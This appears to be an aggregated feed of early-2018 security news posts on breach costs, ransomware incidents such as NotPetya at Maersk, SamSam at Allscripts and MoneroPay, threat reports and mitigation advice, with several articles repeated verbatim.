According to the Ponemon Institute and IBM’s “2017 Cost of Data Breach Study,” the average cost of a data breach was $3.62 million in 2017, up 10 percent from the previous year. The U.S. alone lost an average of $7.35 million per incident, a 5 percent increase from 2016.

Overall, the report noted a marked increase in cybercrime across all categories, including the number of breaches, number of records exposed, and breadth of countries and organizations impacted.

Poor Security Awareness to Blame

The most alarming statistic cited in the report is the fact that 93 percent of incidents could have been prevented by following basic security best practices, such as patching software and conducting phishing training. While 52 percent of breaches were the result of “actual hacks,” 15 percent were due to lack of security software, 11 percent were caused by insufficient insider threat oversight and 8 percent due to phishing attacks.

These numbers suggest an urgent need for greater security awareness. More effective training and more thorough incident response planning can help mitigate these threats and avoid the monumental costs associated with them.

The post Cybersecurity Incidents Doubled in 2017, Study Finds appeared first on Security Intelligence.

No Rest for the Weary: Applying Security Lessons From 2017 in the New Year

How can it be that we are already through January and moving into February of the new year? I don’t know about you, but I still have a long list of resolutions to accomplish and I need to focus on what I can realistically get done in 2018.

This makes me think about how everyone in the security industry has been talking about new initiatives and goals for 2018. However, we would be remiss not to look back at the security lessons we learned and the goals we collectively accomplished in 2017. To get a head start on the new year, we should reflect on these insights and apply them to the work we need to complete in 2018.

Taking Stock of Security Lessons From 2017

So what happened in 2017 that required us to work harder and be more diligent than we thought possible? As an esteemed colleague of mine kindly reminded me, these “exercises” are simply “opportunities” to better our cybersecurity skills.

As we in IBM Security, specifically the X-Force Exchange team, take the time to look back, we can appreciate the hard work and collaboration that transpired to help make the world a safer place. Below are a few highlights and accomplishments we were proud to bring to the security industry last year.

  • We worked together to address data breaches and vulnerabilities that kept us all on our toes. A few of the big ones, such as WannaCry, NotPetya and Bad Rabbit, come to mind.
  • IBM produced the “X-Force 2017 Data Breach Review,” which revealed that:
    • Computer services and government agencies were hardest hit by breaches in terms of number of records and incidents;
    • Misconfigurations accounted for the largest number of records breached; and
    • The U.S. was the largest bull’s-eye for breaches in terms of number of incidents.
  • We grew our user base to over 50,000 security professionals around the globe representing all major industries, and provided a go-to resource to research and share threat intelligence, including both indicators of compromise and higher-order insights.
  • Our team supported the Quad9 initiative with the Packet Clearing House (PCH) and Global Cyber Alliance (GCA). We even offered a domain for anyone to use to enhance security and privacy while traversing the web.
  • We listened to our users’ feedback to further improve the user experience of the X-Force Exchange. We incorporated numerous innovations to the platform, including more robust notifications, a customizable experience and more X-Force research on current threats and vulnerabilities.

Don’t Let Your Guard Down in 2018

Even though we are proud of all the progress we made and security lessons we learned in 2017, we can’t afford to slack on our goals and resolutions for 2018. Bad actors will continue to attack our networks and exploit both known and unknown vulnerabilities. That’s why it is good to set achievable goals to ensure that we are doing everything we can to protect what is most important within our companies. It also means that, as a community of security professionals, we need to keep working together to spread security awareness and deal with whatever threats come our way.

To learn more about how you can get ahead of the next cybercriminal trend, check out the X-Force Exchange and start using it today.

Explore the IBM X-Force Exchange Now

The post No Rest for the Weary: Applying Security Lessons From 2017 in the New Year appeared first on Security Intelligence.

Highlights From the World Economic Forum’s ‘Global Risks Report 2018′

“In a world of complex and interconnected systems, feedback loops, threshold effects and cascading disruptions can lead to sudden and dramatic breakdowns.” — The World Economic Forum’s “Global Risks Report

The post Highlights From the World Economic Forum’s ‘Global Risks Report 2018′ appeared first on The Cyber Security Place.

Highlights From the World Economic Forum’s ‘Global Risks Report 2018’

“In a world of complex and interconnected systems, feedback loops, threshold effects and cascading disruptions can lead to sudden and dramatic breakdowns.” — The World Economic Forum’s “Global Risks Report 2018”

First came the New Year’s Eve parties, followed by New Year’s resolutions and, finally, the annual meeting of global elites at the World Economic Forum (WEF) in Davos, Switzerland, on January 23–26. Just ahead of the event, the WEF released its “Global Risks Report 2018,” a compendium of data points and analysis about the state of economic health around the world.

The report, partly based on a survey of about 1,000 of its members conducted during the second half of 2017, covers all major categories of risk, including economic, environmental, geopolitical, societal and technological. The top four concerns include recurring themes, such as inequality and unfairness, political tensions within and between countries, the environment, and cyber vulnerabilities. It is across this spectrum of global risks that the report warns of “the increased dangers of systemic breakdown,” due in part to our increasing dependence on technology.

A Sharpened Focus on Cyber Risks

For the first time in the history of the “Global Risks Report,” two technological threats — cyberattacks and data fraud or theft — ranked in the top five risks by likelihood. Cyberattacks also figured high on the impact side, coming in sixth place. The report warned of the dangers that await if global leaders don’t take stock of the issues and become more engaged in improving policies, communication, coordination and risk decisions.

As many organizations have found out the hard way in 2017, cybercriminals have access to a target space that is growing at an exponential pace. The report noted that attacks against businesses have doubled in the span of five years and are now considered part of the cost of doing business. Not surprisingly, the report mentioned the prevalence of ransomware in 2017, including mentions of WannaCry and NotPetya, and the significant costs and disruptions created by those events.

The Internet of Things (IoT) is also spotlighted in the report, but not for the technological advancements it provides. Instead, WEF noted that there are now already more IoT devices than people on the planet, and these devices, with their lack of out-of-the-box-security, have already been used to launch distributed denial-of-service (DDoS) attacks at 100 gigabits per second. These events are part of a growing tally of cybercrime costs that could reach $8 trillion by 2022. The report also pointed to increasing evidence of disruptions to systems and services “that keep societies functioning,” including critical infrastructure, government agencies, banks, telecommunications and transportation.

How Cyberthreats Fit Into the Larger Picture

Cyber risks are just one of the many categories of threats that society faces today. However, the 2018 report dedicated more attention to this increasingly important issue, warning of the fragility and instability of technological systems and highlighting the uncertainty that could result from their widespread failure. WEF called out the possibility of “asymmetric economic warfare” as our modern economies increasingly rely on new technologies to drive everything from manufacturing systems to remote healthcare, and the financial infrastructure that powers our online banking and investment transactions.

Addressing the Need for Better Risk Assessment and Management

As a global barometer of economic health and a repository of top concerns, the WEF report also recommended solutions that can help us avoid the cliff. While it noted that global risks are growing in complexity and becoming pervasive with a strong potential for cascading failures, it also emphasized the need for reactions and responses to be determined and coordinated from both a local and global perspective. As 2017 has shown, knowing how best to respond to a cyber crisis is as important as all the work done prior to a breach.

While global economies have improved their ability to measure and mitigate conventional risks, they struggle to understand and address the complex risks that are found at the intersection of the various systems that make our modern world possible. The report section titled “Future Shocks” features stories that illustrate the potential impact of widespread complacency and demonstrate how rapidly risks can propagate between systems and geographic regions.

Toward the end of the “Global Risks Report,” two short essays discussed the need for resilience in complex organizations and the dangers of cognitive bias in risk management. The first essay urged businesses to consider supplementing traditional risk assessments with a “resilience lens” that considers how to improve the organization’s ability to respond to risks.

The second argued that our current understanding of why people react strongly to certain risks but not others is incomplete. It also illustrated the dangers of anchoring and confirmation bias, highlighting top leadership’s tendency to “approach risk analysis as a standalone activity to be ticked off a list, but then fall short on mitigating the risks that their analysis has identified.”

Starting the Conversation With the ‘Global Risks Report’

The “Global Risks Report,” with its focus on world-scale economic opportunities and risks, is written for enterprise leaders in plain, business-friendly language. This year, cyberthreats figure prominently along the various global risks found in our increasingly complex and interconnected world. It makes it a perfect New Year’s gift for chief information security officers (CISOs) to share with their business leaders as a way to examine common concerns and build trust through stronger communication and engagement on a topic that is critical to the survival of organizations around the world.

Listen to the podcast series: Take Back Control of Your Cybersecurity Now

The post Highlights From the World Economic Forum’s ‘Global Risks Report 2018’ appeared first on Security Intelligence.

How can we avoid another record year for breaches and ransomware?

More than 14.5 billion emails laced with malware were sent in 2017 according to the annual Global Security Report issued by AppRiver. The majority of cyber threats were initiated in the US and persisted throughout the year, with significant peaks in August, September and October. In the first half of 2017, 1.9 billion data records were lost or stolen as a result of cyberattacks. This followed a tough year in 2016, when losses totaled $16 … More

HOTforSecurity: Pro tip for 2018: treat the ransomware threat like an imminent hard drive failure

With the General Data Protection Regulation knocking on everyone’s door, breaches will have to be taken more seriously than ever. At the same time, new data indicates that ransomware attacks are rising steeply, which means neither organizations nor regular users can afford to sit around with their arms crossed.

Ransomware attacks doubled in 2017, and were the primary driver of an overall increase in total incidents, according to the latest Cyber Incident & Breach Trends Report from the Online Trust Alliance.

Reported cyber incidents targeting businesses also nearly doubled (from 82,000 in 2016 to 159,700 in 2017). However, since many cyberattacks are never reported, the alliance believes the actual number could be much higher.

Attacks seeking ransom accounted for half of all reported incidents. These included malware-laced phishing attacks, malvertising, drive-by malware, and even a new form of ransomware combined with denial of service (RDoS), where the attacker threatens to attack via denial-of-service if ransom is not paid.

In any case, ransomware has become a massive problem. From the massive WannaCry and Petya/GoldenEye contagions in 2017 to the more recent highly-targeted attacks hitting healthcare providers one after another, everyone is now a blip on cybercrooks’ radar.

Bitdefender predicts that ransomware will become more advanced and more sophisticated in 2018, potentially even using GPU in your computer to speed up the encryption process. And ransomware-as-a-service platforms will make the threat even more accessible to one-off hackers, boosting the volume and complexity of ransomware samples to emerge this year.

But the real reason ransomware poses such a problem for everyone is its anatomy.

Why is ransomware so popular?

Ransomware is a highly efficient, highly lucrative form of malware. Three major drivers have propelled it to its sudden infamy:

  1. Ransomware can infect a computer through an array of attack vectors – from social engineering and spam to drive-by attacks, rigged popular applications, vulnerabilities, and malvertising – and render all data on that machine unusable.
  2. Until recently, you had to know code to hack someone; today, anyone can go to the Dark Web, buy the ransomware of their choosing, and attack.
  3. The anatomy of ransomware ensures that the damage produced is substantial while the attacker can remain completely anonymous, whether you pay him or not.

How to mitigate risk?

According to the same report, some 93 percent of all breaches could have been avoided had simple steps been taken. These can include:

  • regularly update software
  • block fake email messages using email authentication
  • train people to recognize phishing attacks
  • use browser-based scanning for malware
  • limit administrative access to data to contain the spread of an infection
  • use DDoS protection services to limit the impact of an attack

For large businesses, OTA makes the following recommendation:

“…since some organizations may determine that paying a ransom is the necessary course of action for a given incident, and Bitcoin is the most common form of payment request, it is recommended that organizations set up a Bitcoin wallet in advance. This type of proactive planning is not unlike establishing relationships in advance with crisis management firms, forensics specialists and law enforcement – it is easier to make logical, informed decisions during the calm than it is during the storm.”

However, most cybersecurity experts agree that victims should refrain from paying the ransom, as payment encourages criminals to strike again, and gives rise to new legions of hackers. Some law enforcement agencies advise the same.

At the same time, those same agencies (including the FBI) agree that sometimes the damage from lost data can be so large that it’s better to just pay and hope that the hackers stick to their end of the bargain – decrypt the data. But…

What if I don’t want to pay the ransom?

Since your data is inaccessible and unusable, getting infected with ransomware is the same as having your hard drive fail on you. And, make no mistake, hard drives do fail eventually!

“Viewing ransomware as an imminent hard drive failure points toward the simplest measure you can take: keep regular, offline backups of your important data,” says Bogdan Botezatu, senior e-threat analyst, Bitdefender. “This way, even if you get infected, you can always recover your important data, whether it’s photos of your cat, or millions of dollars’ worth of intellectual property.”

For more peace of mind, use a trusted antivirus solution. Bitdefender offers ransomware protection that sniffs out suspicious behavior before you can make a mistake and get infected. It is particularly paranoid about the security of your Documents folder or any other folder you deem highly sensitive, but it also keeps a close check on all files on your system. For Mac users, Bitdefender offers Time Machine backup protection –  to make sure ransomware and attackers can’t touch your backups.



HOTforSecurity

Pro tip for 2018: treat the ransomware threat like an imminent hard drive failure

With the General Data Protection Regulation knocking on everyone’s door, breaches will have to be taken more seriously than ever. At the same time, new data indicates that ransomware attacks are rising steeply, which means neither organizations nor regular users can afford to sit around with their arms crossed.

Ransomware attacks doubled in 2017, and were the primary driver of an overall increase in total incidents, according to the latest Cyber Incident & Breach Trends Report from the Online Trust Alliance.

Reported cyber incidents targeting businesses also nearly doubled (from 82,000 in 2016 to 159,700 in 2017). However, since many cyberattacks are never reported, the alliance believes the actual number could be much higher.

Attacks seeking ransom accounted for half of all reported incidents. These included malware-laced phishing attacks, malvertising, drive-by malware, and even a new form of ransomware combined with denial of service (RDoS), where the attacker threatens to attack via denial-of-service if ransom is not paid.

In any case, ransomware has become a massive problem. From the massive WannaCry and Petya/GoldenEye contagions in 2017 to the more recent highly-targeted attacks hitting healthcare providers one after another, everyone is now a blip on cybercrooks’ radar.

Bitdefender predicts that ransomware will become more advanced and more sophisticated in 2018, potentially even using the GPU in your computer to speed up the encryption process. And ransomware-as-a-service platforms will make the threat even more accessible to one-off hackers, boosting the volume and complexity of ransomware samples to emerge this year.

But the real reason ransomware poses such a problem for everyone is its anatomy.

Why is ransomware so popular?

Ransomware is a highly efficient, highly lucrative form of malware. Three major drivers have propelled it to its sudden infamy:

  1. Ransomware can infect a computer through an array of attack vectors – from social engineering and spam to drive-by attacks, rigged popular applications, vulnerabilities, and malvertising – and render all data on that machine unusable.
  2. Until recently, you had to know code to hack someone; today, anyone can go to the Dark Web, buy the ransomware of their choosing, and attack.
  3. The anatomy of ransomware ensures that the damage produced is substantial while the attacker can remain completely anonymous, whether you pay him or not.

How to mitigate risk?

According to the same report, some 93 percent of all breaches could have been avoided had simple steps been taken. These can include:

  • regularly update software
  • block fake email messages using email authentication
  • train people to recognize phishing attacks
  • use browser-based scanning for malware
  • limit administrative access to data to contain the spread of an infection
  • use DDoS protection services to limit the impact of an attack

For large businesses, OTA makes the following recommendation:

“…since some organizations may determine that paying a ransom is the necessary course of action for a given incident, and Bitcoin is the most common form of payment request, it is recommended that organizations set up a Bitcoin wallet in advance. This type of proactive planning is not unlike establishing relationships in advance with crisis management firms, forensics specialists and law enforcement – it is easier to make logical, informed decisions during the calm than it is during the storm.”

However, most cybersecurity experts agree that victims should refrain from paying the ransom, as payment encourages criminals to strike again, and gives rise to new legions of hackers. Some law enforcement agencies advise the same.

At the same time, those same agencies (including the FBI) agree that sometimes the damage from lost data can be so large that it’s better to just pay and hope that the hackers stick to their end of the bargain – decrypt the data. But…

What if I don’t want to pay the ransom?

Since your data is inaccessible and unusable, getting infected with ransomware is the same as having your hard drive fail on you. And, make no mistake, hard drives do fail eventually!

“Viewing ransomware as an imminent hard drive failure points toward the simplest measure you can take: keep regular, offline backups of your important data,” says Bogdan Botezatu, senior e-threat analyst, Bitdefender. “This way, even if you get infected, you can always recover your important data, whether it’s photos of your cat, or millions of dollars’ worth of intellectual property.”

For more peace of mind, use a trusted antivirus solution. Bitdefender offers ransomware protection that sniffs out suspicious behavior before you can make a mistake and get infected. It is particularly paranoid about the security of your Documents folder or any other folder you deem highly sensitive, but it also keeps a close check on all files on your system. For Mac users, Bitdefender offers Time Machine backup protection –  to make sure ransomware and attackers can’t touch your backups.

WeLiveSecurity: FriedEx: BitPaymer ransomware the work of Dridex authors

In December 2017, we took a closer look at one of the FriedEx samples and almost instantly noticed the resemblance of the code to Dridex, thanks to our long-term research of its developments. Intrigued by the initial findings, we dug deep into the FriedEx samples.

The post FriedEx: BitPaymer ransomware the work of Dridex authors appeared first on WeLiveSecurity



WeLiveSecurity

Rise in cryptomining malware impacts organizations worldwide

Cybercriminals are increasingly turning to cryptominers to develop illegal revenue streams, while ransomware and malvertising adware continue to impact organizations worldwide, according to Check Point. During the period July to December 2017, one in five organizations were impacted by cryptomining malware, tools that enable cybercriminals to hijack the victim’s CPU or GPU power and existing resources to mine cryptocurrency, using as much as 65% of the end-user’s CPU power. Key malware trends in H2 2017 … More

Webroot Threat Blog: Cyber News Rundown: Evrial Trojan Targets Bitcoin Users

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst and a guy with a passion for all things security. Any questions? Just ask.

New Trojan Alters Bitcoin Addresses

A newly discovered trojan variant targets Bitcoin users and, more specifically, any Bitcoin addresses that may be copied into the device’s clipboard. The trojan “Evrial” can alter the address in the clipboard so funds are transferred elsewhere when a user performs a Bitcoin transaction. Additionally, Evrial is capable of stealing cookies and any credentials that are being stored within web browsersto further compromise any purchases made on the device.

Paradise Ransomware is Anything But

In a recent return, new attacks have been linked to Paradise ransomware, which had been relatively quiet since its initial burst of attacks last year. Not much has changed for the variant since its previous reveal; it still requires a user to open a phony email attachment and unzip the packed infection. Unfortunately, there is no easy way to decrypt any of the affected files, and the user would need to either restore everything from a clean backup or pay the ransom, which varies based on the victim’s reply time.

Top UK Law Firms Face Massive Breach

Researchers have recently discovered several data dumps that contain over a million email credentials from several of the largest law firms in the UK. Based on the information found in the dumps, roughly 2,000 credentials belonged to each of the companies; the largest company is responsible for over 30,000 of them. Even worse, many of the dumps were released just in the last six months, though most come from third-party breaches.

 

Don't Get Hacked

Major Twitter Accounts Hacked

Several high-profile Twitter accounts were compromised over the last week and used to spread Turkish and Palestinian propaganda while attempting to phish the credentials of related accounts. Along with the credentials, it appears that private messages and other sensitive information were breached as well, leaving the compromised accounts even more vulnerable.

Business Security Moving Forward

Following a Ponemon Institute study from late last year, many were shocked at the results from the companies who responded. Over half of the 1,000 IT professionals surveyed claimed to have suffered a ransomware attack within the last year, and the majority of those reported the cause to be phishing and social engineering tactics. Even more worrisome, the average data breach involved the compromise of an average of 9,000 unique records, costing victims several million dollars to return to normal.

The post Cyber News Rundown: Evrial Trojan Targets Bitcoin Users appeared first on Webroot Threat Blog.



Webroot Threat Blog

Security Affairs: Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.

The shipping giant Maersk was one of the companies that suffered the NotPetya massive attack, in August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Maersk

Now the Møller-Maersk chair Jim Hagemann Snabe has shared further details on the attack suffered by the company during a speech at the World Economic Forum this week.

Snabe explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

The IT staff worked hard for ten days to restore normal operations.

“And that was done in a heroic effort over ten days,” Snabe said.

“Normally – I come from the IT industry – you would say that would take six months. I can only thank the employees and partners we had doing that.”

Snabe defined the incident as a “very significant wake-up call,” a strong security posture for a company is essential for the development of its business.

Snabe pointed out that Maersk was the victim of the militarization of a cyberspace, the damages were caused by a cyber weapon used by a foreign government to hit Ukraine.

Maersk ship docks worldwide every 15 minutes, unloading between 10,000 to 20,000 containers. The effects of the attack were dramatic and only the heroic effort of the staff that manually restored the normal situation allowed to contain the damages.

Snabe claimed only “a 20 per cent drop in volumes,” and described the efforts of its IT staff as “human resilience”.

Snabe is aware of the risks for companies that operate on the Internet and urges an improvement of infrastructure.

“There is a need for a radical improvement of infrastructure.” he said.

Maersk chair also highlighted the importance of collaboration between companies, technology companies, and law enforcement.

Pierluigi Paganini

(Security Affairs – NotPetya ransomware, Maersk)

The post Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack appeared first on Security Affairs.



Security Affairs

Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.

The shipping giant Maersk was one of the companies that suffered the NotPetya massive attack, in August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Maersk

Now the Møller-Maersk chair Jim Hagemann Snabe has shared further details on the attack suffered by the company during a speech at the World Economic Forum this week.

Snabe explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

The IT staff worked hard for ten days to restore normal operations.

“And that was done in a heroic effort over ten days,” Snabe said.

“Normally – I come from the IT industry – you would say that would take six months. I can only thank the employees and partners we had doing that.”

Snabe defined the incident as a “very significant wake-up call,” a strong security posture for a company is essential for the development of its business.

Snabe pointed out that Maersk was the victim of the militarization of a cyberspace, the damages were caused by a cyber weapon used by a foreign government to hit Ukraine.

Maersk ship docks worldwide every 15 minutes, unloading between 10,000 to 20,000 containers. The effects of the attack were dramatic and only the heroic effort of the staff that manually restored the normal situation allowed to contain the damages.

Snabe claimed only “a 20 per cent drop in volumes,” and described the efforts of its IT staff as “human resilience”.

Snabe is aware of the risks for companies that operate on the Internet and urges an improvement of infrastructure.

“There is a need for a radical improvement of infrastructure.” he said.

Maersk chair also highlighted the importance of collaboration between companies, technology companies, and law enforcement.

Pierluigi Paganini

(Security Affairs – NotPetya ransomware, Maersk)

The post Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack appeared first on Security Affairs.

New ransomware dubbed MoneroPay targets crypto-fans, impersonates wallet

Crypto-fans are now being targeted by MoneroPay, a new ransomware released in a thread discussing altcoin on popular crypto forum BitcoinTalk on Jan. 6. Posing as a wallet for the SpriteCoin cryptocurrency, enthusiasts rushed to download it in the desire to make a lot of money fast.

The authors of the ransomware took advantage of the surge in interest in cryptocurrency to target some tech-savvy users. These wallets are often reported by security solutions so many users have made a habit of disabling the solution to minimize false positives.

The hackers behind MoneroPay exploited this practice and created the malware to perfectly impersonate a regular installation. Once MoneroPay was installed on their devices, it started collecting user data and passwords saved in Firefox and Chrome. The data is sent to a C2 server.

The victims figured out they were dealing with ransomware after full sync with the blockchain was completed and an announcement appeared that their data is encrypted.

According to BleepingComputer, the ransomware encrypts files with extensions affiliated with programing languages such as txt, doc, rtf, cpp, tcl, html, ppt, docx, xls, xlsx, pptx, key, pem, psd, mkv, mp4, ogv, zip, jpg, jpeg, work, pyw, hpp, cgi, rar, lua, img, iso, webm, jar, java, class, one, htm, css, vbs, eps, psf, png, apk, ps1, wallet.dat. MoneroPay adds the .encrypted extension to the infected files.

Even though crypto-fans are usually tech savvy, malware developers collect insights from multiple threads on the forum, and elsewhere, to take advantage of their weaknesses. This is precisely why they need to take extra security measures such as keeping regular backups of their data so it can be restored if encrypted or lost, and using a virtual machine to scan files before download to ensure they’re not malware.

HOTforSecurity: New ransomware dubbed MoneroPay targets crypto-fans, impersonates wallet

Crypto-fans are now being targeted by MoneroPay, a new ransomware released in a thread discussing altcoin on popular crypto forum BitcoinTalk on Jan. 6. Posing as a wallet for the SpriteCoin cryptocurrency, enthusiasts rushed to download it in the desire to make a lot of money fast.

The authors of the ransomware took advantage of the surge in interest in cryptocurrency to target some tech-savvy users. These wallets are often reported by security solutions so many users have made a habit of disabling the solution to minimize false positives.

The hackers behind MoneroPay exploited this practice and created the malware to perfectly impersonate a regular installation. Once MoneroPay was installed on their devices, it started collecting user data and passwords saved in Firefox and Chrome. The data is sent to a C2 server.

The victims figured out they were dealing with ransomware after full sync with the blockchain was completed and an announcement appeared that their data is encrypted.

According to BleepingComputer, the ransomware encrypts files with extensions affiliated with programing languages such as txt, doc, rtf, cpp, tcl, html, ppt, docx, xls, xlsx, pptx, key, pem, psd, mkv, mp4, ogv, zip, jpg, jpeg, work, pyw, hpp, cgi, rar, lua, img, iso, webm, jar, java, class, one, htm, css, vbs, eps, psf, png, apk, ps1, wallet.dat. MoneroPay adds the .encrypted extension to the infected files.

Even though crypto-fans are usually tech savvy, malware developers collect insights from multiple threads on the forum, and elsewhere, to take advantage of their weaknesses. This is precisely why they need to take extra security measures such as keeping regular backups of their data so it can be restored if encrypted or lost, and using a virtual machine to scan files before download to ensure they’re not malware.



HOTforSecurity

New ransomware attack forces hospitals to turn away patients

Allscripts, a provider of electronic health record (EHR) technology to hospitals, was hit by ransomware this week, provoking an outage that affected thousands of physicians’ practices and healthcare providers across the United States.

Allscripts reportedly handles data for 180,000 physicians, 100,000 electronic prescribing physicians, 40,000 in-home clinicians, 2,700 hospitals, 13,000 extended care organizations and 7 million patients across the country. Besides EHR tools, it develops and sells solutions for patient engagement and care coordination, as well as financial and analytics technology.

Early this week, the company confirmed to partnering hospitals that it fell victim to a ransomware attack that crippled its systems.

Ransomware is malware that encrypts data on the endpoints it infects. If successful, the malware displays a note demanding payment – in the form of untraceable digital currency – in exchange for decrypting the data.

As reported by Healthcare IT News, facilities relying on their own server were less severely affected than those relying on cloud-hosted services and applications supplied by Allscripts.

Cleveland’s News 5 confirmed this with doctors at Pulmonary Physicians in Canton. Because of the Allscripts outage, the office has not been able to access vital patient information, and is forced to turn away its patients.

Like Hancock Health and Adams Memorial, Allscripts was apparently hit by the same type of ransomware – albeit a slightly different strain – dubbed SamSam. It emerged in 2016 and specifically targeted the healthcare industry.

SamSam spreads through the web and Java apps, and specifically targets external-facing RDP servers. It relies on unsophisticated techniques (i.e. brute force tools) to guess weak passwords and make its way into the network. Thanks to a wormable component, once it makes its way inside, it spreads laterally to infect other vulnerable systems.

David Finn, an executive at consulting firm CynergisTek, points out that organizations use endpoint protection tools but forget to lock up servers with antimalware solutions.

“It needs to be on all of your endpoints. We sometimes forget about those servers being endpoints,” said Finn.

Allscripts has not yet issued a public statement on the attack.

HOTforSecurity: New ransomware attack forces hospitals to turn away patients

Allscripts, a provider of electronic health record (EHR) technology to hospitals, was hit by ransomware this week, provoking an outage that affected thousands of physicians’ practices and healthcare providers across the United States.

Allscripts reportedly handles data for 180,000 physicians, 100,000 electronic prescribing physicians, 40,000 in-home clinicians, 2,700 hospitals, 13,000 extended care organizations and 7 million patients across the country. Besides EHR tools, it develops and sells solutions for patient engagement and care coordination, as well as financial and analytics technology.

Early this week, the company confirmed to partnering hospitals that it fell victim to a ransomware attack that crippled its systems.

Ransomware is malware that encrypts data on the endpoints it infects. If successful, the malware displays a note demanding payment – in the form of untraceable digital currency – in exchange for decrypting the data.

As reported by Healthcare IT News, facilities relying on their own server were less severely affected than those relying on cloud-hosted services and applications supplied by Allscripts.

Cleveland’s News 5 confirmed this with doctors at Pulmonary Physicians in Canton. Because of the Allscripts outage, the office has not been able to access vital patient information, and is forced to turn away its patients.

Like Hancock Health and Adams Memorial, Allscripts was apparently hit by the same type of ransomware – albeit a slightly different strain – dubbed SamSam. It emerged in 2016 and specifically targeted the healthcare industry.

SamSam spreads through the web and Java apps, and specifically targets external-facing RDP servers. It relies on unsophisticated techniques (i.e. brute force tools) to guess weak passwords and make its way into the network. Thanks to a wormable component, once it makes its way inside, it spreads laterally to infect other vulnerable systems.

David Finn, an executive at consulting firm CynergisTek, points out that organizations use endpoint protection tools but forget to lock up servers with antimalware solutions.

“It needs to be on all of your endpoints. We sometimes forget about those servers being endpoints,” said Finn.

Allscripts has not yet issued a public statement on the attack.



HOTforSecurity

Presenting: Malwarebytes Labs 2017 State of Malware Report

2017 was a tumultuous year in politics, media, gender, race—and cybersecurity didn’t beat the rap. Last year was full of twists and turns in the cybercrime world, with major outbreaks, new infection methods, and the evolution of the cryptocurrency crime industry.

In aiming to make sense of the madness, we gathered information from our data science, research, and intel teams throughout the year, checking in on trends, the rise and fall of malware families, distribution methods, and more. What we came up with was a more complete picture of the 2017 threat landscape that showed us just how much can change in a year.

In our 2017 State of Malware report, we examined attack methods, malware developments, and distribution techniques used by cybercriminals over the last 12 months. We dove into the exponential increases of malware volume and severity year-over-year, as well as trends in high-impact threats, such as ransomware and cryptomining. Some of our key takeaways include:

Ransomware volume was up in 2017, but trending downward.

Ransomware detections were up 90 and 93 percent for businesses and consumers respectively in 2017, with several splashy outbreaks accounting for the majority of the increase in rates. However, development of new families and tactics for delivery slowed way down, especially in the last quarter of the year.

What they can’t hold for ransom, criminals will steal instead.

With ransomware slowly going out of favor, criminals pivoted to banking Trojans, spyware, and hijackers in 2017 to attack companies instead. We saw an increase of 40 percent in hijackers and 30 percent in spyware detections in 2017. The second half of the year also marked an average of 102 percent increase in banking Trojan detections.

Cryptomining is out of control.

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

In addition to looking back at 2017, we looked forward to 2018, analyzing current trends and pontificating on what they point to. We realize making predictions about cybercrime is a bit more art than science, but when we look back over years of patterns and data and experience, we can make some educated guesses about where we think this is all going. With that in mind, some of our 2018 predictions include:

A “slow” year for Internet of Things threats means more attacks in 2018.

Attackers spent a lot of time in 2017 developing new tools to take advantage of IoT with spam-spreading botnets and, likely, more DDoS attacks. It’s not farfetched to think we may see DDoS attacks against large organizations, like airline companies and power utilities, demanding a ransom to call off an army of botnet-infected IoT devices. But rather than encrypt files, the attacks will disrupt businesses and their operations until payment has been made.

Cryptocurrency mining fever will give birth to dangerous new threats.

Drive-by mining and skyrocketing values are driving interest in cryptomining from both users and criminals alike—to the point where retailers are now screening potential graphics card customers for miners. Faced with continued volatility, we are likely going to see an evolution of drive-by mining tools, new mining platforms (such as Android and IoT devices), and new forms of malware designed to mine and/or steal cryptocurrency.

To see our complete analysis of key developments in malware, the most interesting attack vectors of the year, predictions for 2018, and more, read:

the 2017 State of Malware report

The post Presenting: Malwarebytes Labs 2017 State of Malware Report appeared first on Malwarebytes Labs.

Three-Quarters of Organizations Experienced Phishing Attacks in 2017, Report Uncovers

Phishing attacks continue to threaten organizations’ digital security in droves. Kaspersky Lab prevented 46,557,343 phishing attempts in the second quarter of 2017 alone. Overall, close to one in ten (8.26%) of Kaspersky users encountered a phishing attack that quarter. Recognizing the prevalence of phishing, it’s useful to examine the granular details of this attack method. […]… Read More

The post Three-Quarters of Organizations Experienced Phishing Attacks in 2017, Report Uncovers appeared first on The State of Security.

Hunton Publishes Retail Year in Review

On January 18, 2018, Hunton & Williams LLP’s retail industry lawyers, composed of more than 100 lawyers across practices, released their annual Retail Year in Review publication. The Retail Year in Review includes several articles authored by our Global Privacy and Cybersecurity lawyers, and touches on many topics of interest including blockchain, ransomware, cyber insurance and the Internet of Things.

Read the full publication.

Human trafficking victims forced to defraud Chinese computer users

Late last week, the Croatian police executed a coordinated raid on two houses where 59 individuals were confined and forced into defrauding Chinese and Taiwanese computer and smartphone users through a police-ransom-type-of-scheme. According to an announcement by the Croatian Ministry of the Interior, the raids were the result of a months-long joint investigation with the Slovenian National Police and a collaboration with the People’s Republic of China’s police force. The 59 individuals – mostly from … More

Engineering Firm Pays $1.3K after Ransomware Affects Servers, Backups

